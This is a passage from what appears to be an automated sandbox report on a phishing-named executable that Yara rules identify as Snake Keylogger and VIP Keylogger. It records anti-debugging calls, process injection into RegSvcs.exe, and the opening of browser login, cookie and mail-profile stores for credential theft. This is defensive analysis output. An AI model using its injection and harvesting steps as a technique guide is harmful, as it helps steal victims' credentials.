                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                  Source: RegSvcs.exe, 00000009.00000002.2599518844.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                  Source: RegSvcs.exe, 00000003.00000002.2605360123.0000000000C87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltion
                  Source: wscript.exe, 00000005.00000002.1556781131.000002937BD04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}{>
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F8EAA2 BlockInput,1_2_00F8EAA2
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00F42622
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00F142DE
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F34CE8 mov eax, dword ptr fs:[00000030h]1_2_00F34CE8
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_016001F8 mov eax, dword ptr fs:[00000030h]1_2_016001F8
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_01600258 mov eax, dword ptr fs:[00000030h]1_2_01600258
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_015FEBC8 mov eax, dword ptr fs:[00000030h]1_2_015FEBC8
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D84CE8 mov eax, dword ptr fs:[00000030h]2_2_00D84CE8
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_0140D270 mov eax, dword ptr fs:[00000030h]2_2_0140D270
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_0140D210 mov eax, dword ptr fs:[00000030h]2_2_0140D210
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_0140BBE0 mov eax, dword ptr fs:[00000030h]2_2_0140BBE0
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 8_2_0134B528 mov eax, dword ptr fs:[00000030h]8_2_0134B528
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 8_2_01349E98 mov eax, dword ptr fs:[00000030h]8_2_01349E98
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 8_2_0134B4C8 mov eax, dword ptr fs:[00000030h]8_2_0134B4C8
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_2_00F70B62
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00F42622
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F3083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00F3083F
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F309D5 SetUnhandledExceptionFilter,1_2_00F309D5
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F30C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00F30C21
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D92622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D92622
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D8083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D8083F
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D809D5 SetUnhandledExceptionFilter,2_2_00D809D5
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D80C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00D80C21
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6DE008Jump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AFB008Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F71201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_00F71201
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F52BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00F52BA5
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F7B226 SendInput,keybd_event,1_2_00F7B226
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,1_2_00F922DA
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\supergroup\ageless.exe "C:\Users\user\AppData\Local\supergroup\ageless.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\supergroup\ageless.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_2_00F70B62
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F71663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_00F71663
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exe, ageless.exe.1.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exe, ageless.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F30698 cpuid 1_2_00F30698
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F88195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,1_2_00F88195
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F6D27A GetUserNameW,1_2_00F6D27A
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F4B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,1_2_00F4B952
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00F142DE
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ageless.exe PID: 7768, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7804, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ageless.exe PID: 7440, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7432, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ageless.exe PID: 7768, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7804, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ageless.exe PID: 7440, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: ageless.exeBinary or memory string: WIN_81
                  Source: ageless.exeBinary or memory string: WIN_XP
                  Source: ageless.exe.1.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: ageless.exeBinary or memory string: WIN_XPe
                  Source: ageless.exeBinary or memory string: WIN_VISTA
                  Source: ageless.exeBinary or memory string: WIN_7
                  Source: ageless.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPE
